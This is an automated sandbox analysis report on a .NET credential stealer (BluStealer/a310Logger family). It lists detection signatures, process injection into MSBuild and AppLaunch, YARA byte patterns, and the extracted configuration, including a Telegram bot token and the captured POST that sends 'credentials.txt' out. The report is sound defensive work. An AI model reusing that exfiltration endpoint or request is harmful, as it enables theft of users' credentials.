Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.W32.AIDetectNet.01.19566.31995

Overview

General Information

Sample Name:SecuriteInfo.com.W32.AIDetectNet.01.19566.31995 (renamed file extension from 31995 to exe)
Analysis ID:679095
MD5:7278f8490937cab29d3dd5bc75cb52ab
SHA1:69a0419c995fc139ea27e731a44205cb1b686f1d
SHA256:0fabbda008ee7544a4f2d1bdaf5621f19bc41e82740f293dfe1644fc0af9230b
Tags:exe
Infos:

Detection

BluStealer, ThunderFox Stealer, a310Logger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected BluStealer
Antivirus / Scanner detection for submitted sample
Yara detected a310Logger
Yara detected ThunderFox Stealer
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Yara detected Generic Downloader
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains very large array initializations
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains strange resources
Uses a known web browser user agent for HTTP communication
Contains functionality to detect virtual machines (SLDT)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.W32.AIDetectNet.01.19566.exe (PID: 2068 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe" MD5: 7278F8490937CAB29D3DD5BC75CB52AB)
    • MSBuild.exe (PID: 3396 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: D621FD77BD585874F9686D3A76462EF1)
    • MSBuild.exe (PID: 6000 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: D621FD77BD585874F9686D3A76462EF1)
      • AppLaunch.exe (PID: 5848 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe MD5: 6807F903AC06FF7E1670181378690B22)
  • cleanup

Malware Configuration

Threatname: BluStealer

{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot5446953292:AAFkDq-HVam91vjV2SXkAWjbhfkBnxaPoa4/sendMessage?chat_id=1269002131"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000010.00000002.403484045.0000000009250000.00000004.08000000.00040000.00000000.sdmpQuasar_RAT_1Detects Quasar RATFlorian Roth
  • 0x5fa84:$op1: 04 1E FE 02 04 16 FE 01 60
  • 0x5f98d:$op2: 00 17 03 1F 20 17 19 15 28
  • 0x604c0:$op3: 00 04 03 69 91 1B 40
  • 0x60d64:$op3: 00 04 03 69 91 1B 40
00000010.00000002.403484045.0000000009250000.00000004.08000000.00040000.00000000.sdmpHKTL_NET_GUID_SharpScribblesDetects .NET red/black-team tools via typelibguidArnim Rupp
  • 0x96952:$typelibguid0: aa61a166-31ef-429d-a971-ca654cd18c3b
00000000.00000002.408533446.0000000005B80000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
    00000000.00000002.383910090.000000000470F000.00000004.00000800.00020000.00000000.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
    • 0x6212c:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
    00000010.00000003.380923428.0000000007E66000.00000004.00000800.00020000.00000000.sdmpQuasar_RAT_1Detects Quasar RATFlorian Roth
    • 0x9416c:$op1: 04 1E FE 02 04 16 FE 01 60
    • 0x94075:$op2: 00 17 03 1F 20 17 19 15 28
    • 0x94ba8:$op3: 00 04 03 69 91 1B 40
    • 0x9544c:$op3: 00 04 03 69 91 1B 40
    Click to see the 8 entries

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    16.3.AppLaunch.exe.7e9a6e8.0.raw.unpackQuasar_RAT_1Detects Quasar RATFlorian Roth
    • 0x5fa84:$op1: 04 1E FE 02 04 16 FE 01 60
    • 0x5f98d:$op2: 00 17 03 1F 20 17 19 15 28
    • 0x604c0:$op3: 00 04 03 69 91 1B 40
    • 0x60d64:$op3: 00 04 03 69 91 1B 40
    16.3.AppLaunch.exe.7e9a6e8.0.raw.unpackHKTL_NET_GUID_SharpScribblesDetects .NET red/black-team tools via typelibguidArnim Rupp
    • 0x96952:$typelibguid0: aa61a166-31ef-429d-a971-ca654cd18c3b
    0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.466f2e8.2.raw.unpackMALWARE_Win_A310LoggerDetects A310LoggerditekSHen
    • 0x63884:$s1: Temporary Directory * for
    • 0x638c0:$s2: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\*RD_
    • 0x62e94:$s5: MSXML2.ServerXMLHTTP.6.0
    • 0x63058:$s6: Content-Disposition: form-data; name="document"; filename="
    • 0x63804:$s7: CopyHere
    • 0x637cc:$s9: shell.application
    • 0x63830:$s9: Shell.Application
    • 0x62f94:$s10: SetRequestHeader
    • 0x63970:$s12: @TITLE Removing
    • 0x639a8:$s13: @RD /S /Q "
    0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.466f2e8.2.unpackMALWARE_Win_A310LoggerDetects A310LoggerditekSHen
    • 0x63884:$s1: Temporary Directory * for
    • 0x638c0:$s2: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\*RD_
    • 0x62e94:$s5: MSXML2.ServerXMLHTTP.6.0
    • 0x63058:$s6: Content-Disposition: form-data; name="document"; filename="
    • 0x63804:$s7: CopyHere
    • 0x637cc:$s9: shell.application
    • 0x63830:$s9: Shell.Application
    • 0x62f94:$s10: SetRequestHeader
    • 0x63970:$s12: @TITLE Removing
    • 0x639a8:$s13: @RD /S /Q "
    16.3.AppLaunch.exe.7e9a6e8.0.unpackQuasar_RAT_1Detects Quasar RATFlorian Roth
    • 0x5de84:$op1: 04 1E FE 02 04 16 FE 01 60
    • 0x5dd8d:$op2: 00 17 03 1F 20 17 19 15 28
    • 0x5e8c0:$op3: 00 04 03 69 91 1B 40
    • 0x5f164:$op3: 00 04 03 69 91 1B 40
    Click to see the 11 entries

    Sigma Signatures

    No Sigma rule has matched

    Snort Signatures

    No Snort rule has matched

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Multi AV Scanner detection for submitted file
    Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exeVirustotal: Detection: 25%Perma Link
    Antivirus / Scanner detection for submitted sample
    Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exeAvira: detected
    Machine Learning detection for sample
    Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exeJoe Sandbox ML: detected
    Source: 14.0.MSBuild.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
    Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.461f2c8.1.unpackAvira: Label: TR/Patched.Ren.Gen
    Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.470f308.3.unpackAvira: Label: TR/Dropper.Gen
    Source: 0.0.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.f10000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen7
    Source: 16.0.AppLaunch.exe.4e00000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen
    Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.45f72a8.0.unpackAvira: Label: TR/Patched.Ren.Gen
    Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.466f2e8.2.unpackAvira: Label: TR/Dropper.Gen
    Source: 14.0.MSBuild.exe.400000.0.unpackMalware Configuration Extractor: BluStealer {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot5446953292:AAFkDq-HVam91vjV2SXkAWjbhfkBnxaPoa4/sendMessage?chat_id=1269002131"}
    Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.3:49744 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.3:49745 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49751 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.42.16:443 -> 192.168.2.3:49752 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.3:49753 version: TLS 1.2
    Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: ThunderFox.pdb source: AppLaunch.exe, 00000010.00000002.403484045.0000000009250000.00000004.08000000.00040000.00000000.sdmp, AppLaunch.exe, 00000010.00000002.400484465.0000000006E41000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000010.00000003.380923428.0000000007E66000.00000004.00000800.00020000.00000000.sdmp
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\

    Networking

    barindex
    Uses the Telegram API (likely for C&C communication)
    Source: unknownDNS query: name: api.telegram.org
    Yara detected Generic Downloader
    Source: Yara matchFile source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.5b80000.4.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 00000000.00000002.408533446.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
    Source: Joe Sandbox ViewJA3 fingerprint: 10ee8d30a5d01c042afd7b2b205facc4
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
    Source: global trafficHTTP traffic detected: POST /bot5446953292:AAFkDq-HVam91vjV2SXkAWjbhfkBnxaPoa4/sendDocument?chat_id=1269002131&caption=credentials.txt:::computer\user HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-usAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 201Connection: Keep-AliveCache-Control: no-cache
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49688
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
    Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
    Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49688 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
    Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.4
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.4
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.4
    Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.108.210
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.108.210
    Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.108.210
    Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.108.210
    Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.108.210
    Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.108.210
    Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.108.210
    Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.4
    Source: unknownTCP traffic detected without corresponding DNS query: 209.197.3.8
    Source: unknownTCP traffic detected without corresponding DNS query: 209.197.3.8
    Source: unknownTCP traffic detected without corresponding DNS query: 23.201.249.71
    Source: unknownTCP traffic detected without corresponding DNS query: 23.201.249.71
    Source: unknownTCP traffic detected without corresponding DNS query: 23.201.249.71
    Source: unknownTCP traffic detected without corresponding DNS query: 23.211.5.146
    Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
    Source: unknownTCP traffic detected without corresponding DNS query: 209.197.3.8
    Source: unknownTCP traffic detected without corresponding DNS query: 209.197.3.8
    Source: unknownTCP traffic detected without corresponding DNS query: 209.197.3.8
    Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.42.16
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.42.16
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.5.88
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.5.88
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.5.88
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.42.16
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.5.88
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.5.88
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.5.88
    Source: MSBuild.exe, 0000000E.00000002.537276033.0000000000F73000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000003.421757868.0000000000F5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe, 00000000.00000002.359072458.000000000340B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
    Source: MSBuild.exe, 0000000E.00000002.534247106.0000000000EE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/
    Source: MSBuild.exe, 0000000E.00000002.534247106.0000000000EE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/Qv
    Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe, 00000000.00000002.383910090.000000000470F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000000.351294987.0000000000401000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
    Source: MSBuild.exe, 0000000E.00000002.534247106.0000000000EE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5446953292:AAFkDq-HVam91vjV2SXkAWjbhfkBnxaPoa4/sendDocument?chat_id=1269
    Source: MSBuild.exe, 0000000E.00000003.422081191.0000000000F11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
    Source: unknownHTTP traffic detected: POST /bot5446953292:AAFkDq-HVam91vjV2SXkAWjbhfkBnxaPoa4/sendDocument?chat_id=1269002131&caption=credentials.txt:::computer\user HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-usAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 201Connection: Keep-AliveCache-Control: no-cache
    Source: unknownDNS traffic detected: queries for: api.telegram.org
    Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.3:49744 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.3:49745 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49751 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.42.16:443 -> 192.168.2.3:49752 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.3:49753 version: TLS 1.2

    System Summary

    barindex
    Malicious sample detected (through community Yara rule)
    Source: 16.3.AppLaunch.exe.7e9a6e8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
    Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.466f2e8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects A310Logger Author: ditekSHen
    Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.466f2e8.2.unpack, type: UNPACKEDPEMatched rule: Detects A310Logger Author: ditekSHen
    Source: 16.3.AppLaunch.exe.7e9a6e8.0.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
    Source: 16.2.AppLaunch.exe.9250000.0.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
    Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.470f308.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects A310Logger Author: ditekSHen
    Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.45f72a8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects A310Logger Author: ditekSHen
    Source: 14.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects A310Logger Author: ditekSHen
    Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.470f308.3.unpack, type: UNPACKEDPEMatched rule: Detects A310Logger Author: ditekSHen
    Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.461f2c8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects A310Logger Author: ditekSHen
    Source: 16.2.AppLaunch.exe.9250000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
    Source: 00000010.00000002.403484045.0000000009250000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
    Source: 00000000.00000002.383910090.000000000470F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000010.00000003.380923428.0000000007E66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
    Source: 00000000.00000002.379707702.0000000004597000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000000.00000002.364389176.00000000043F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    .NET source code contains very large array initializations
    Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe, bgr.csLarge array initialization: tms: array initializer size 2385920
    Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: 16.3.AppLaunch.exe.7e9a6e8.0.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 16.3.AppLaunch.exe.7e9a6e8.0.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_SharpScribbles date = 2021-01-21, author = Arnim Rupp, description = Detects .NET red/black-team tools via typelibguid, reference = https://github.com/V1V1/SharpScribbles, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.466f2e8.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
    Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.466f2e8.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
    Source: 16.3.AppLaunch.exe.7e9a6e8.0.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 16.2.AppLaunch.exe.9250000.0.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 16.3.AppLaunch.exe.7e9a6e8.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_SharpScribbles date = 2021-01-21, author = Arnim Rupp, description = Detects .NET red/black-team tools via typelibguid, reference = https://github.com/V1V1/SharpScribbles, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 16.2.AppLaunch.exe.9250000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_SharpScribbles date = 2021-01-21, author = Arnim Rupp, description = Detects .NET red/black-team tools via typelibguid, reference = https://github.com/V1V1/SharpScribbles, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.470f308.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
    Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.45f72a8.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
    Source: 14.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
    Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.470f308.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
    Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.461f2c8.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
    Source: 16.2.AppLaunch.exe.9250000.0.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 16.2.AppLaunch.exe.9250000.0.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_SharpScribbles date = 2021-01-21, author = Arnim Rupp, description = Detects .NET red/black-team tools via typelibguid, reference = https://github.com/V1V1/SharpScribbles, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000010.00000002.403484045.0000000009250000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000010.00000002.403484045.0000000009250000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_SharpScribbles date = 2021-01-21, author = Arnim Rupp, description = Detects .NET red/black-team tools via typelibguid, reference = https://github.com/V1V1/SharpScribbles, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000000.00000002.383910090.000000000470F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
